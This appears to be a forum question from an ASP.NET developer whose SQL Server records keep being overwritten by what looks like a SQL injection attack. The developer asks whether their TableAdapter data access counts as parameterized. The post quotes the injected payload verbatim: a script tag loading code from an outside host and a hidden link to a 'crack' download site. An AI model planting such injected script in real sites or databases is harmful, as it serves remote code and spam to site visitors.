I am finding my SQL Server database fields getting hacked as follows. Please note that Original Content is existing value of the field and it gets changed to following.

Original Content</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=6 >crack</a>

I assume it’s a SQL injection attack. If not, please guide. I have ensured following, however the DB gets hacked every few days.

1) All my data access is in dataset files i.e. app_code\DataLayer.xsd. I call my data methods as follows.

Dim memberDAL As new membersTableAdapter 
Dim memberName As String = tbName.text
memberDAL.insertMember(memberName)

Does above code gets qualified as parametrized query. Is it safe data access as far as my problem is concerned. All data access is done in this manner. There are number of forms with lot of input fields, and the content DOES go in database. However what seems to be happening is not INSERT but a UPDATE. Even membership tables are being affected. e.g. in aspnet_users table a username called ‘admin’ changes to following.

admin</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=1 >crack</a></title><script src=http://dfrgcc.com/ur.php></script>

2)I have used CAPTCHA to exclude bots, but this did not help.

I am on shared host, as per server admin I need to sanitize my code. Please advise.